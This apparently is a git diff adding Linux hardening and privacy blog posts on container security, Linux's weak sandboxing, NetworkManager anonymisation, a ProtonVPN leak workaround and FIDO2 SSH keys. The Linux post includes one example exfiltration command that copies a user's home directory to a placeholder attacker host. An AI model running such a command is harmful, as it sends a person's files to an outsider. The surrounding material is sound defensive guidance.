As an image maintainer, you can sign your images to improve the authenticity assurance. Most official images make use of [Docker Content Trust](https://docs.docker.com/engine/security/trust/), which works with an OCI registry attached to a [Notary server](https://github.com/notaryproject/notary). With the Docker toolset, setting the environment variable `DOCKER_CONTENT_TRUST=1` enforces signature verification (a signature is only good if it's checked in the first place). The SigStore initiative is developing [cosign](https://github.com/sigstore/cosign), an alternative that doesn't require a Notary server because it works with features already provided by the registry, such as tags. Kubernetes users may be interested in [Connaisseur](https://github.com/sse-secure-systems/connaisseur) to ensure all signatures have been validated.

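As a sketch of the cosign workflow (the registry and image names are placeholders):

```
# Generate a key pair (cosign.key / cosign.pub)
cosign generate-key-pair

# Sign the image and push the signature to the registry
cosign sign --key cosign.key registry.example.com/myorg/myimage:1.0.0

# Verify the signature before pulling or deploying
cosign verify --key cosign.pub registry.example.com/myorg/myimage:1.0.0
```
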
## Leave my root alone!

### Attack surface

Traditionally, Docker runs as a daemon owned by root. That also means that root in the container is actually root on the host, and may be only a few commands away from compromising the host. More generally, the attacker has to exploit the available attack surface to escape the container. There is a huge attack surface, actually: the Linux kernel. [Someone wise once said](https://grsecurity.net/huawei_hksp_introduces_trivially_exploitable_vulnerability):

> The kernel can effectively be thought of as the largest, most vulnerable setuid root binary on the system.

That applies particularly to traditional containers, which weren't designed to provide a robust level of isolation. A recent example was [CVE-2022-0492](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/): the attacker could abuse root in the container to exploit cgroups v1 and compromise the host. Of course, defense-in-depth measures would have prevented that, and we'll mention them. But fundamentally, container escapes are possible by design.

Breaking out via the OCI runtime `runc` is also possible, although [CVE-2019-5736](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/) was a particularly nasty bug. The attacker had to gain access to root in the container first in order to access `/proc/[runc-pid]/exe`, which points to where the `runc` binary can be overwritten.

Good practices have therefore been established:

- Avoid using root in the container, plain and simple.
- Keep the host kernel, Docker and the OCI runtime updated.
- Consider the usage of user namespaces.

By the way, it goes without saying that any user who has access to the Docker daemon should be considered as privileged as root. Mounting the Docker socket (`/var/run/docker.sock`) in a container makes it highly privileged, and so it should be avoided. The socket should only be owned by root, and if that doesn't work with your environment, use Docker rootless or Podman.

### Avoiding root

root can be avoided in different ways in the final container:

- Image creation time: setting the `USER` instruction in the Dockerfile.
- Container creation time: via the tools available (`user:` in the Compose file).
- Container runtime: dropping privileges with entrypoint scripts (`gosu UID:GID`).

Well-made images with security in mind will have a `USER` instruction. In my experience, most people will run images blindly, so it's good harm reduction. Setting the user manually works in some images that weren't designed with rootless operation in mind, and it's also great for mitigating some scenarios where the image is controlled by an attacker. You also won't have surprises when mounting volumes, so I highly recommend setting the user explicitly and making sure volume permissions are correct once.

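A minimal sketch of setting the user at container creation time in a Compose file (the UID/GID pair is an example):

```
services:
  myapp:
    image: myorg/myapp
    # Run as an unprivileged UID:GID instead of root
    user: "1000:1000"
```
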
Some images allow users to define their own user with UID/GID environment variables, with an entrypoint script that runs as root and takes care of the volume permissions before dropping privileges. While technically fine, it is still attack surface, and it requires the `SETUID`/`SETGID` capabilities to be available in the container.

### User namespaces: sandbox or paradox?

As mentioned just above, [user namespaces](https://www.man7.org/linux/man-pages/man7/user_namespaces.7.html) are a solution to ensure root in the container is not root on the host. Docker supports user namespaces; for instance, you could set the default mapping in `/etc/docker/daemon.json`:

```
"userns-remap": "default"
```

`whoami && sleep 60` in the container will return root, but `ps -fC sleep` on the host will show us the PID of another user. That is nice, but it has limitations and therefore shouldn't be considered a real sandbox. In fact, the paradox is that [user namespaces are attack surface](https://lists.archlinux.org/pipermail/arch-general/2017-February/043066.html) (and vulnerabilities are still being found [years later](https://www.openwall.com/lists/oss-security/2022/01/29/1)), and it's common wisdom to restrict them to privileged users (`kernel.unprivileged_userns_clone=0`). That is fine for Docker with its traditional root daemon, but Podman expects you to let unprivileged users interact with user namespaces (so essentially privileged code).

Enabling `userns-remap` in Docker shouldn't be a substitute for running unprivileged application containers (where applicable). User namespaces are mostly useful if you intend to run full-fledged OS containers, which need root in order to function, but that is out of the scope of the container technologies mentioned in this article; for them, I'd argue exposing such a vulnerable attack surface from the host kernel for dubious sandboxing benefits isn't an interesting trade-off to make.

### The no_new_privs bit

After ensuring root isn't used in your containers, you should look into setting the `no_new_privs` bit. [This Linux feature](https://docs.kernel.org/userspace-api/no_new_privs.html) restricts syscalls such as `execve()` from granting privileges, which is what you want in order to restrict in-container privilege escalation. This flag can be set for a given container in a Compose file:

```
security_opt:
  - no-new-privileges:true
```

Gaining privileges in the container will be much harder that way.

### Capabilities

Furthermore, we should mention capabilities: root powers are divided into distinct units by the Linux kernel, called capabilities. Each granted capability also grants privilege, and therefore access to a significant amount of attack surface. Security researcher Brad Spengler enumerates [19 important capabilities](https://forums.grsecurity.net/viewtopic.php?f=7&t=2522#p10271). Docker **restricts certain capabilities by default**, but [some of the most important ones](https://github.com/moby/moby/blob/1308a3a99faa13ff279dcb4eb5ad23aee3ab5cdb/oci/caps/defaults.go) are still available to a container by default.

You should consider the following rule of thumb:

- Drop all capabilities by default.
- Allow only the ones you really need to.

If you already run your containers unprivileged and without root, your container will very likely work fine with all capabilities dropped. That can be done in a Compose file:

```
cap_drop:
  - ALL
#cap_add:
#  - CHOWN
#  - DAC_READ_SEARCH
#  - SETUID
#  - SETGID
```

Never use the `--privileged` option unless you really need to: a privileged container is given access to almost all capabilities, kernel features and devices.

## Other security features

MACs and seccomp are robust tools that may vastly improve container security.

### Mandatory Access Control

MAC stands for Mandatory Access Control: traditionally a Linux Security Module that will enforce a policy to restrict the userspace. Examples are **AppArmor** and **SELinux**: the former being easier to use, the latter more fine-grained. Both are strong tools that can help... yet their sole presence does not mean they're really effective. A robust policy starts from a *deny all* policy, and only allows the necessary resources to be accessed.

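For illustration, a custom profile can be applied per container via `security_opt` (a sketch; `my-deny-all-base` is a placeholder profile that must already be loaded on the host):

```
security_opt:
  - apparmor:my-deny-all-base
```
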
### seccomp

seccomp (short for secure computing mode), on the other hand, is a much simpler and complementary tool, and there is no reason not to use it. What it does is restrict a process to a set of system calls, thus drastically reducing the available attack surface.

Docker provides default profiles for [AppArmor](https://github.com/moby/moby/tree/85eaf23bf46b12827273ab2ff523c753117dbdc7/profiles/apparmor) and [seccomp](https://github.com/moby/moby/blob/85eaf23bf46b12827273ab2ff523c753117dbdc7/profiles/seccomp/default.json), and they're enabled by default for newly created containers unless the `unconfined` option is explicitly passed. Note: Kubernetes doesn't enable the default seccomp profile by default, so you should probably [try it](https://kubernetes.io/docs/tutorials/security/seccomp/#enable-the-use-of-runtimedefault-as-the-default-seccomp-profile-for-all-workloads).

These profiles are a great start, but you should do much more if you take security seriously, because they were made not to break compatibility with a large range of images. The default seccomp profile only disables [around 44 syscalls](https://docs.docker.com/engine/security/seccomp/#significant-syscalls-blocked-by-the-default-profile), most of which are uncommon and/or obsolete. Of course, the best profile is one written for a given program. It also doesn't make sense to dwell on the permissiveness of the default profiles, as [a lot of work has gone](https://blog.jessfraz.com/post/containers-security-and-echo-chambers/) into hardening containers.

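Likewise, a custom seccomp profile can be passed per container; a sketch in a Compose file (the profile path is an example):

```
security_opt:
  - seccomp:./my-seccomp-profile.json
```
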
### cgroups

Use cgroups to restrict access to hardware and system resources. You likely don't want a guest container to monopolize the host's resources. You also don't want to be vulnerable to stupid fork bomb attacks. In a Compose file, consider setting these limits:

```
mem_limit: 4g
cpus: 4
pids_limit: 256
```

More runtime options can be found in [the official documentation](https://docs.docker.com/config/containers/resource_constraints/). All of them should have a [Compose spec](https://github.com/compose-spec/compose-spec/blob/master/spec.md) equivalent.

The `--cgroup-parent` option should be avoided, as it uses the host cgroup and not the one configured by Docker (or other tools), which is the default.

### Read-only filesystem

It is good practice to treat the image as what some refer to as the "golden image".

In other words, you'll run containers in *read-only* mode, with an immutable filesystem inherited from the image. Only the mounted volumes will be read/write accessible, and those should ideally be mounted with the `noexec`, `nosuid` and `nodev` options for extra security. If read/write access isn't needed, mount these volumes as read-only too.

However, the image may not be perfect and may still require read/write access to some parts of the filesystem, likely directories such as `/tmp`, `/run` or `/var`. You can make a **tmpfs** for those (a temporary filesystem in memory allotted to the container), because they don't hold persistent data anyway.

In a Compose file, that would look like the following settings:

```
read_only: true
tmpfs:
  - /tmp:size=10M,mode=0770,uid=1000,gid=1000,noexec,nosuid,nodev
```

That is quite verbose indeed, but that's to show you the different options for a tmpfs mount. Ideally, you want to restrict them in both size and permissions.

### Network isolation

By default, all Docker containers will use the default network bridge. They will see and be able to communicate with each other. Each container should have its own user-defined bridge network, and each connection between containers should have an internal network. If you intend to run a reverse proxy in front of several containers, you should make a dedicated network for each container you want to expose to the reverse proxy.

The `--network host` option also shouldn't be used, for obvious reasons: the container would share the same network as the host, providing no isolation at all.

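As a sketch, such a topology could look like this in a Compose file (service and network names are examples):

```
services:
  reverse-proxy:
    image: caddy
    networks:
      - frontend
  app:
    image: myorg/myapp
    networks:
      - frontend
      - backend
  db:
    image: postgres
    networks:
      - backend

networks:
  frontend:
  backend:
    internal: true
```
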
## Alternative runtimes (gVisor)

`runc` is the reference OCI runtime, but that means other runtimes can exist as well, as long as they're compliant with the OCI standard. These runtimes can be interchanged quite seamlessly. There are a few alternatives, such as [crun](https://github.com/containers/crun) or [youki](https://github.com/containers/youki), respectively implemented in C and Rust (`runc` is a Go implementation). However, there is one particular runtime that does a lot more for security: `runsc`, provided by the [gVisor project](https://gvisor.dev/) from the folks at Google.

**Containers are not a sandbox**, and while we can improve their security, they will fundamentally share a common attack surface with the host. Virtual machines are a solution to that problem, but you might prefer container semantics and ecosystem. gVisor can be perceived as an attempt to get the "best of both worlds": containers that are easy to manage while providing a native isolation boundary. gVisor did just that by implementing two things:

- **Sentry**: an application kernel in Go, a language known to be memory-safe. It implements the Linux logic in userspace, such as various system calls.
- **Gofer**: a host process which communicates with Sentry and the host filesystem, since Sentry is restricted in that aspect.

A platform like ptrace or KVM is used to intercept system calls and redirect them from the application to Sentry, which runs in userspace. This has some costs: there is a higher per-syscall overhead, and compatibility is reduced since not all syscalls are implemented. On top of that, gVisor employs security mechanisms we've glanced over above, such as a [very restrictive seccomp profile](https://github.com/google/gvisor/blob/86ad7d5b5838da1b539e976886d04b93c939ca3d/runsc/boot/filter/config.go) between Sentry and the host kernel, the [no_new_privs bit](https://github.com/google/gvisor/blob/6ef268409620c57197b9d573e23be8cb05dbf381/pkg/sentry/kernel/task_identity.go#L464), and namespaces isolated from the host.

The security model of gVisor is comparable to what you would expect from a virtual machine. It is also very easy to [install and use](https://gvisor.dev/docs/user_guide/install/). The path to `runsc`, along with its different configuration flags (`runsc flags`), should be added to `/etc/docker/daemon.json`:

```json
"runtimes": {
    "runsc-ptrace": {
        "path": "/usr/local/bin/runsc",
        "runtimeArgs": [
            "--platform=ptrace"
        ]
    },
    "runsc-kvm": {
        "path": "/usr/local/bin/runsc",
        "runtimeArgs": [
            "--platform=kvm"
        ]
    }
}
```

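After restarting the Docker daemon, a container can be run under gVisor by selecting one of these runtimes; for instance (the image name is just an example):

```
docker run --rm --runtime=runsc-ptrace alpine uname -a
```
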
`runsc` needs to start as root to set up some mitigations, including the use of its own network stack separated from the host. The sandbox itself drops privileges to nobody as soon as possible. You can still use `runsc` rootless if you want (which should be needed for Podman):

```
./runsc --rootless do uname -a
*** Warning: sandbox network isn't supported with --rootless, switching to host ***
Linux 4.4.0 #1 SMP Sun Jan 10 15:06:54 PST 2016 x86_64 GNU/Linux
```

Linux 4.4.0 is shown because that is the version of the Linux API that Sentry tries to mimic. As you've probably guessed, you're not really using Linux 4.4.0, but an application kernel that behaves like it. By the way, gVisor is of course compatible with cgroups.

## Conclusion: what's a container after all?

As I wrote above, a container is mostly defined by its semantics and ecosystem. Containers shouldn't be solely defined by the OCI reference runtime implementation, as we've seen with gVisor, which provides an entirely different security model.

Still not convinced? What if I told you a container can leverage the same technologies as a virtual machine? That is exactly what [Kata Containers](https://katacontainers.io/) does by using a VMM like QEMU-lite to provide containers that are in fact lightweight virtual machines, with their traditional resources and security model, compatibility with container semantics and toolsets, and an optimized overhead. While not in the OCI ecosystem, Amazon achieves quite the same with [Firecracker](https://firecracker-microvm.github.io/).

If you're running untrusted workloads, I highly suggest you consider gVisor instead of a traditional container runtime. Your definition of "untrusted" may vary: for me, almost everything should be considered untrusted. That is how modern security works, and how mobile operating systems work. It's quite simple: security should be simple, and gVisor simply offers native security.

Containers are a popular, yet strange world. They revolutionized the way we make and deploy software, but one should not lose sight of what they really are and aren't. This hardening guide is non-exhaustive, but I hope it can make you aware of some aspects you've never thought of.

58
content/posts/linux/Linux Insecurities.md
Normal file

@ -0,0 +1,58 @@

---
title: "Linux Insecurities"
date: 2022-07-18
tags: ['Operating Systems', 'Linux', 'Security']
author: Tommy
---

There is a common misconception among privacy communities that Linux is one of the more secure operating systems, either because it is open source or because it is widely used in the cloud. However, this is a far cry from reality.

There is already a very in-depth technical blog post explaining the various security weaknesses of Linux by Madaidan, [Whonix](https://www.whonix.org/)'s security researcher. This page will attempt to address some of the questions commonly raised in reaction to his blog post. You can find the original article [here](https://madaidans-insecurities.github.io/linux.html).

## Why is Linux used on servers if it is so insecure?

On servers, while most of the problems referenced in the article still exist, they are somewhat less problematic.

On desktop Linux, GUI applications run under your user, and thus have access to all of your files in `/home`. This is in contrast to how system daemons typically run on servers, where they have their own group and user. For example, NGINX will run under `nginx:nginx` on Red Hat distributions, or `www-data:www-data` on Debian-based ones. Discretionary Access Control does help with filesystem access control for server processes, but it is useless for desktop applications.

Another thing to keep in mind is that Mandatory Access Control is also somewhat effective on servers, as commonly run system daemons are confined. In contrast, on desktop, there is virtually no AppArmor profile to confine even regularly used apps like Chrome or Firefox, let alone less common ones. On SELinux systems, these apps run in the UNCONFINED SELinux domain.

Linux servers are also lighter than desktop Linux systems by orders of magnitude, without hundreds of packages and dozens of system daemons running like X11, audio servers, or the printing stack. Thus, the attack surface is much smaller.

## Linux Hardening Myths

There is a common claim in response to Madaidan that Linux is only insecure by default, and that an experienced user can make it the most secure operating system out there, surpassing the likes of macOS or ChromeOS. Unfortunately, this is wishful thinking. There is no amount of hardening that one can reasonably apply as a user to fix up the inherent issues with Linux.

### Lack of verified boot

macOS, ChromeOS, and Android have a clear distinction between the system and user-installed applications. In oversimplified terms, the system volume is signed by the OS vendor, and the firmware and boot loader work to make sure that said volume has the authorized signature. The operating system itself is immutable, and nothing the user does will need or be allowed to tamper with the system volume.

On Linux, there is no such clear distinction between the system and user-installed applications. Linux distributions are a bunch of packages put together to make a system that works, and thus every package is treated as part of said system. The end result is that binaries, regardless of whether they are vital for the system to function or just an extra application, are thrown into the same directories as each other (namely `/usr/bin` and `/usr/local/bin`). This makes it impossible for an end user to set up a verification mechanism to verify the integrity of "the system", as said "system" is not clearly defined in the first place.

### Lack of application sandboxing

Operating systems like Android and ChromeOS have full-system mandatory access control: every process, starting from the init process, is strictly confined. Regardless of which applications you install or how you install them, they have to play by the rules of an untrusted SELinux domain and are only able to utilize unprivileged APIs.

Even on macOS, where the application sandbox is opt-in for developers, there is still a permission control system (TCC) for unprivileged applications. Apps run by the user do not have unrestricted access to the microphone, webcam, keystrokes, sensitive documents, and so on.

On Linux, it is quite the opposite. Out of the box, most systems only have a few system daemons confined. Some Linux distributions don't even have a Mandatory Access Control system at all. Applications are designed in an environment where they expect to be able to do whatever they want, and the app sandboxes/mandatory access control systems are merely an afterthought trying to restrict an app to only what it expects to be accessible.

This is reflected in the underutilization of the [Portals API](https://docs.flatpak.org/en/latest/portal-api-reference.html), as an example. Portals is designed to be an API where apps have to prompt the user to access their files (through the file manager) or their microphone and camera. Unfortunately, the vast majority of apps are not designed with this in mind and expect direct access to the filesystem, the PulseAudio socket, or the entire `/dev`. As a result, Flatpak maintainers often opt for extremely lax permissions, to the point where they have to grant `filesystem=home`, `filesystem=host`, `socket=pulseaudio` or `devices=all`, otherwise apps will break and give users a bad experience.

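For what it's worth, users can revoke some of these permissions per app with `flatpak override`, though doing so may break the app (the application ID here is a placeholder):

```bash
# Revoke home directory and PulseAudio access for a single application
flatpak override --user --nofilesystem=home --nosocket=pulseaudio com.example.App
```
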
To make matters worse, some system daemons are not designed with permission control in mind at all. For example, PulseAudio does not have any concept of audio-in or audio-out permissions. Thus, the user is often left with only the choice of granting an app access to the socket or not. If they want to block microphone access, they have to block access to the socket, and thus break audio playback in the process. If they do want audio playback, then they have to allow access to the PulseAudio socket, which in turn gives an app unrestricted access to record them at any moment.

The only way to systematically fix this problem is to design a whole new system from scratch with a permission model like that of Android in mind. And even when that happens, it will take substantial work to get developers to develop their apps for said system.

## But Linux is open source!

Something being open source does not imply that it is inherently private, secure, or trustworthy. I recommend reading the [FLOSS Security](/posts/knowledge/floss-security) post by [Rohan Kumar](https://seirdy.one/posts/2022/02/02/floss-security/).

## But there is less malware on Linux!

**Security by irrelevance does not work**. Just because there are fewer users of your favorite operating system does not make it any safer.

Ask yourself this: Would you ditch Windows for ReactOS, considering that it is a lot less popular and less targeted? Likewise, if desktop Linux became the mainstream solution, would you ditch it for the BSDs or some other niche operating system just because they are less popular?

Malware for Linux does exist, and it is not hard to make. It can be something as trivial as a shell script or binary executing `scp -r ~/ malware@xx.xx.xx.xx:/data`. Due to the lack of application sandboxing or an application permission model, your computer can be compromised the moment you execute a malicious binary, shell script, or install script, with or without root, and with or without an exploit. This is, of course, not to discount the fact that many exploits exist on Linux, just as on any other operating system.

181
content/posts/linux/NetworkManager Trackability Reduction.md
Normal file

@ -0,0 +1,181 @@

---
title: "NetworkManager Trackability Reduction"
tags: ['Operating Systems', 'Linux', 'Privacy']
date: 2022-09-04
author: WfKe9vLwSvv7rN
canonicalURL: https://wanderingcomputerer.gitlab.io/guides/tips/nm-hardening/
ShowCanonicalLink: true
---

## MAC address randomization

Note that Ethernet connections can still be tracked via switch ports, and WiFi connections can be broadly localized by access point.

Furthermore, MAC address spoofing and randomization depend on firmware support from the interface. Most modern network interface cards support the feature.

There are three different aspects of MAC address randomization in NetworkManager, each with its own configuration flag:

#### WiFi scanning

```
[device]
wifi.scan-rand-mac-address=yes
```

#### WiFi connections

```
[connection]
wifi.cloned-mac-address=<mode>
```

#### Ethernet connections

```
[connection]
ethernet.cloned-mac-address=<mode>
```

#### Mode options

`random`: Generate a new random MAC address every time a connection is activated

`stable`: Assign each connection a random MAC address that will be maintained across activations

`preserve`: Use the MAC address already assigned to the interface (such as from `macchanger`), or the permanent address if none is assigned

`permanent`: Use the MAC address permanently baked into the hardware

### Setting a default configuration {#macrand-default-configuration}

It's best to create a dedicated configuration file, such as `/etc/NetworkManager/conf.d/99-random-mac.conf`, to ensure package updates do not overwrite the configuration. In general, I recommend the following:

```
[device]
wifi.scan-rand-mac-address=yes

[connection]
wifi.cloned-mac-address=random
ethernet.cloned-mac-address=random
```

This configuration randomizes all MAC addresses by default. These settings can of course be [overridden on a per-connection basis](#per-connection-overrides).

After editing the file, run `sudo nmcli general reload conf` to apply the new configuration.

### Per-connection overrides

Connection-specific settings take precedence over configuration file defaults. They can be set through `nm-connection-editor` ("Network Connections"), a DE-specific network settings GUI, `nmtui`, or `nmcli`.

Look for "Cloned MAC address" under the "Wi-Fi" or "Ethernet" section:

In addition to the four mode keywords, you can input an exact MAC address to be used for that connection.

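The same override can be applied from the command line; for example (the connection name is a placeholder):

```bash
nmcli connection modify "MyHomeWifi" wifi.cloned-mac-address stable
```
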
For a home or other trusted network, it can be helpful to use `stable` or even `permanent`, as MAC address stability can help avoid being repeatedly served a new IP address and DHCP lease (though not all DHCP servers work this way).

For public networks with captive portals (webpages that must be accessed to gain network access), the `stable` setting can help prevent redirection back to the captive portal after a brief disconnection or roaming to a different access point.

### Seeing the randomized MAC address

Activate the connection in question, and then look for `GENERAL.HWADDR` in the output of `nmcli device show`. This represents the MAC address currently in use by the interface, whether randomized or not. It is also visible as "Hardware Address" (or similar) in NetworkManager GUIs under active connection details.

```bash
$ nmcli device show
GENERAL.DEVICE:     enp5s0
GENERAL.TYPE:       ethernet
GENERAL.HWADDR:     XX:XX:XX:XX:XX:XX

GENERAL.DEVICE:     wlp3s0
GENERAL.TYPE:       wifi
GENERAL.HWADDR:     XX:XX:XX:XX:XX:XX
```

---

## Remove static hostname to prevent hostname broadcast

```bash
sudo hostnamectl hostname "localhost"
```

An empty (blank) hostname is also an option, but a static hostname of "localhost" is less likely to cause breakage. Both will result in no hostname being broadcast to the DHCP server.

### Disabling transient hostname management {#rmhostname-transient}

It's best to create a dedicated configuration file, such as `/etc/NetworkManager/conf.d/01-transient-hostname.conf`, to ensure package updates do not overwrite the configuration:

```
[main]
hostname-mode=none
```

This will prevent NetworkManager from setting transient hostnames that may be provided by some DHCP servers. It will have no visible effect except with an empty static hostname.

After editing the file, run `sudo nmcli general reload conf` to apply the new configuration. Run `sudo hostnamectl --transient hostname ""` to reset the transient hostname.

---

## Disable sending hostname to DHCP server

**This configuration will leak your hostname on first connection.** Setting a generic or random hostname is strongly recommended if possible.

Due to [limitations in NetworkManager](https://gitlab.freedesktop.org/NetworkManager/NetworkManager/-/issues/584 "NetworkManager issue: No way to set dhcp-send-hostname globally"), it is not possible to reliably disable sending hostnames by default. This setup is very much a hack.

Due to being leaky, this configuration is virtually useless without also [randomizing MAC addresses by default](#macrand-default-configuration "MAC address randomization — Setting a default configuration"). Your MAC address and hostname will not be correlated starting with the second connection, assuming the first connection used a random MAC address.

Create `/etc/NetworkManager/dispatcher.d/no-wait.d/01-no-send-hostname.sh` as follows:

```sh
#!/bin/sh

# If the connection is explicitly set to use the permanent MAC address,
# allow sending the hostname; otherwise, suppress it for both IPv4 and IPv6.
if [ "$(nmcli -g 802-11-wireless.cloned-mac-address c show "$CONNECTION_UUID")" = 'permanent' ] \
    || [ "$(nmcli -g 802-3-ethernet.cloned-mac-address c show "$CONNECTION_UUID")" = 'permanent' ]
then
    nmcli connection modify "$CONNECTION_UUID" \
        ipv4.dhcp-send-hostname true \
        ipv6.dhcp-send-hostname true
else
    nmcli connection modify "$CONNECTION_UUID" \
        ipv4.dhcp-send-hostname false \
        ipv6.dhcp-send-hostname false
fi
```

The script must have specific file permissions and a symlink to take effect:

```bash
cd /etc/NetworkManager/dispatcher.d/
sudo chown root:root no-wait.d/01-no-send-hostname.sh
sudo chmod 744 no-wait.d/01-no-send-hostname.sh
sudo ln -s no-wait.d/01-no-send-hostname.sh ./
```

This script will be automatically triggered on connection events to modify the connection's `dhcp-send-hostname` settings. If the connection's _cloned MAC address_ is [explicitly overridden](#per-connection-overrides) to `permanent`, the hostname will be sent to the DHCP server on future connections. In all other cases, the hostname will be masked on future connections, so the DHCP server will only see the MAC address.

### Verifying proper operation

After initiating a first connection to a network:

```bash
$ nmcli c show <connection> | grep dhcp-send-hostname
ipv4.dhcp-send-hostname:    no
ipv6.dhcp-send-hostname:    no
```

`<connection>` can be the connection name (usually the SSID for WiFi networks) or UUID, obtained from `nmcli c show [--active]`.

_Recall that these setting values are set based on the previous connection activation and take effect for the next connection activation._

---

## Sources

- [ArchWiki --- NetworkManager](https://wiki.archlinux.org/title/NetworkManager#Configuring_MAC_address_randomization)
- [hostnamectl man page](https://www.freedesktop.org/software/systemd/man/hostnamectl)
- [MAC Address Spoofing in NetworkManager 1.4.0](https://blogs.gnome.org/thaller/2016/08/26/mac-address-spoofing-in-networkmanager-1-4-0/)
- [NetworkManager.conf man page](https://networkmanager.dev/docs/api/latest/NetworkManager.conf.html)
- [NetworkManager-dispatcher man page](https://networkmanager.dev/docs/api/latest/NetworkManager-dispatcher.html)
- [NetworkManager: Disable Sending Hostname to DHCP Server](https://viliampucik.blogspot.com/2016/09/networkmanager-disable-sending-hostname.html)
- [nmcli man page](https://networkmanager.dev/docs/api/latest/nmcli.html)

@ -0,0 +1,84 @@

---
title: "ProtonVPN IP Leakage on Linux and Workaround"
date: 2022-10-08
tags: ['Applications', 'Linux', 'Qubes OS', 'Privacy']
author: Tommy
---

**Before We Start**...

I sent Proton an email regarding this issue in late August 2022 and was told they are working on fixing it, though it will take some time, as it requires some architectural changes in how the killswitch works.

## The Leak

Ideally, when implementing a killswitch, a VPN client should drop all connections on non-VPN interfaces except when the connection is to the VPN provider's servers. This is necessary to prevent accidental leaks, at least by unprivileged applications. Unfortunately, the ProtonVPN client does not currently do this.

Effectively, any application that binds to the connected physical interface (as opposed to the VPN's virtual interface) on your Linux system will expose your actual IP address, regardless of the killswitch state. This is problematic, especially for certain applications like torrent clients, as they tend to use whatever interfaces they can access (rather than just the default one) to connect to the internet.

You can check this with `curl`:

```bash
curl --interface <physical interface> https://ipinfo.io
```

This will return your actual IP address.

## The Workaround

### Qubes OS

On Qubes OS, you generally should not have a problem if you use the ProtonVPN client in a ProxyVM. While the same issue still exists within the ProxyVM itself, it is unlikely to manifest, as you should not be running any other applications in the same qube anyway, and apps in an AppVM cannot bind to the public interface of the ProxyVM. I have not observed any leaks from an AppVM behind a ProtonVPN ProxyVM.

### General Linux Distributions

On a general Linux distribution, the workaround is to configure OpenVPN manually and set up a killswitch yourself.

Since ProtonVPN does not support IPv6, you should disable it in your kernel settings:

```bash
echo 'net.ipv6.conf.all.disable_ipv6=1
net.ipv6.conf.default.disable_ipv6=1
net.ipv6.conf.lo.disable_ipv6=1' | sudo tee /etc/sysctl.d/10-disable-ipv6.conf
sudo sysctl --system
```

Next, download your OpenVPN configuration files from [account.protonvpn.com](https://account.protonvpn.com/). In those configuration files, you should see a list of IP addresses and ports for ProtonVPN's servers.

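You can then connect manually using one of the downloaded configuration files (the file name here is just an example):

```bash
sudo openvpn --config ~/Downloads/us-free-01.protonvpn.com.udp.ovpn
```
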
Finally, set up the VPN killswitch. The rules I posted here are based on [this discussion](https://airvpn.org/forums/topic/15061-firewalld-killswitch/).

#### Firewalld

```bash
sudo firewall-cmd --direct --permanent --add-rule ipv4 filter FORWARD 0 -o tun+ -j ACCEPT
sudo firewall-cmd --direct --permanent --add-rule ipv4 filter FORWARD 0 -i tun+ -j ACCEPT

sudo firewall-cmd --direct --permanent --add-rule ipv6 filter INPUT 0 -j DROP
sudo firewall-cmd --direct --permanent --add-rule ipv4 filter INPUT 0 -i lo -j ACCEPT
sudo firewall-cmd --direct --permanent --add-rule ipv4 filter INPUT 1 -i tun+ -p tcp -j ACCEPT
sudo firewall-cmd --direct --permanent --add-rule ipv4 filter INPUT 1 -i tun+ -p udp -j ACCEPT
sudo firewall-cmd --direct --permanent --add-rule ipv4 filter INPUT 999 -j DROP

sudo firewall-cmd --direct --permanent --add-rule ipv6 filter OUTPUT 0 -j DROP
sudo firewall-cmd --direct --permanent --add-rule ipv4 filter OUTPUT 0 -o lo -j ACCEPT
sudo firewall-cmd --direct --permanent --add-rule ipv4 filter OUTPUT 0 -o tun+ -j ACCEPT

# You will need to add each IP address and port pair with the following command:
sudo firewall-cmd --direct --permanent --add-rule ipv4 filter OUTPUT 1 -p udp -m udp --dport $PORT -d $IP -j ACCEPT

sudo firewall-cmd --direct --permanent --add-rule ipv4 filter OUTPUT 999 -j DROP

sudo firewall-cmd --reload
```

#### UFW

```bash
sudo ufw default deny incoming
sudo ufw default deny outgoing

# You will need to add each IP address and port pair with the following command:
sudo ufw allow out to $IP port $PORT proto udp

sudo ufw allow out on tun0 from any to any
```

75
content/posts/linux/Securing OpenSSH with FIDO2.md
Normal file

@ -0,0 +1,75 @@

---
title: "Securing OpenSSH with FIDO2"
date: 2022-04-09T17:43:12Z
tags: ['Operating Systems', 'Linux', 'Security']
author: Wonderfall
canonicalURL: https://wonderfall.dev/openssh-fido2/
ShowCanonicalLink: true
---

Passwordless authentication with OpenSSH keys has been the *de facto* security standard for years. SSH keys are more robust since they're cryptographically sane by default, and are therefore resilient to most brute-force attacks. They're also easier to manage while enabling a form of decentralized authentication (it's easy and painless to revoke them). So, what's the next step? And more exactly, why would one need something even better?

## Why?

The main problem with SSH keys is that they're not magic: they consist of a key pair, of which the private key is stored on your disk. You should be wary of various exfiltration attempts, depending on your threat model:

- If your disk is not encrypted, any physical access could compromise your keys.
- If your private key isn't encrypted, malicious applications could compromise it.
- Even with both encrypted, malicious applications could register your keystrokes.

All these attempts are particularly a concern on desktop platforms, because they don't have a proper sandboxing model. On Windows, non-UWP apps could likely have full access to your `.ssh` directory. On desktop Linux distributions, sandboxing is also lacking, and the situation is even worse if you're using X.org, since it allows apps to spy on each other (and on your keyboard) by design. A first good step would be to only use SSH from a trusted and decently secure system.

Another layer of defense would obviously be multi-factor authentication, so that you're not relying on a stored secret alone. We can use FIDO2 security keys for that. That way, even if your private key is compromised, the attacker needs physical access to your security key. TOTP is another common 2FA technique, but it's vulnerable to various attacks and relies on the quality of the implementation on the server.

|
||||
|
||||
|
||||
## How?

Fortunately for us, [OpenSSH 8.2](https://www.openssh.com/txt/release-8.2) (released in February 2020) introduced native support for FIDO2/U2F. Most OpenSSH distributions should have the middleware set to use the `libfido2` library, including portable versions such as the one [for Win32](https://github.com/PowerShell/Win32-OpenSSH).

Basically, `ssh-keygen -t ${key_type}-sk` will generate a token-backed key pair for us. The key types that are supported depend on your security key: newer models should support both ECDSA-P256 (`ecdsa-sk`) and Ed25519 (`ed25519-sk`). If the latter is available, you should prefer it.

### Client configuration

To get started:

```
ssh-keygen -t ed25519-sk
```

This will generate an `id_ed25519_sk` private key and an `id_ed25519_sk.pub` public key in `.ssh`. These are the defaults, but you can change them if you want. We will call this key pair a "handle", because it isn't sufficient by itself to derive the real secret (as you guessed, the FIDO2 token is needed). `ssh-keygen` should ask you to touch the key, and to enter the PIN prior to that if you set one (you probably should).
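
If you manage several keys, you can point SSH at the handle explicitly in `~/.ssh/config`. A minimal sketch (the host alias and hostname are illustrative assumptions):

```
Host myserver
    HostName server.domain.tld
    User user
    IdentityFile ~/.ssh/id_ed25519_sk
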